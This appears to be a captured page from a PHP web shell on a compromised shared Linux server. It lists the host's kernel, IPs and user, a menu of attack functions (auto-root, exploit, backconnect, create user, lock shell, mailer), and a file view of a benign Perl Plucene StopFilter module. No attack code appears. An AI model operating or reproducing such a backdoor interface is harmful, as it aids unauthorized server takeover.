Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Plucene /
Analysis /
[ HOME SHELL ]
Name
Size
Permission
Action
Standard
[ DIR ]
drwxr-xr-x
Analyzer.pm
864
B
-rw-r--r--
CharTokenizer.pm
1.58
KB
-rw-r--r--
LetterTokenizer.pm
532
B
-rw-r--r--
LowerCaseFilter.pm
627
B
-rw-r--r--
LowerCaseTokenizer.pm
421
B
-rw-r--r--
PorterStemFilter.pm
1.72
KB
-rw-r--r--
SimpleAnalyzer.pm
799
B
-rw-r--r--
StopAnalyzer.pm
1.09
KB
-rw-r--r--
StopFilter.pm
934
B
-rw-r--r--
Token.pm
1.21
KB
-rw-r--r--
TokenFilter.pm
548
B
-rw-r--r--
Tokenizer.pm
851
B
-rw-r--r--
WhitespaceAnalyzer.pm
795
B
-rw-r--r--
WhitespaceTokenizer.pm
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : StopFilter.pm
package Plucene::Analysis::StopFilter; =head1 NAME Plucene::Analysis::StopFilter - the stop filter =head1 SYNOPSIS # isa Plucene::Analysis::TokenFilter my $next = $stop_filter->next; =head1 DESCRIPTION This removes stop words from a token stream. Instances of the StopFilter class are tokens filters that removes from the indexed text words of your choice. Typically this is used to filter out common words ('the', 'a' 'if' etc) that increase the overhead but add no value during searches. =head1 METHODS =cut use strict; use warnings; use base 'Plucene::Analysis::TokenFilter'; =head2 next my $next = $stop_filter->next; This returns the next input token whose term is not a stop word. =cut sub next { my $self = shift; $self->{stophash} ||= { map { $_ => 1 } @{ $self->{stoplist} } }; while (my $t = $self->input->next) { next if exists $self->{stophash}->{ $t->text() }; return $t; } return; } 1;
Close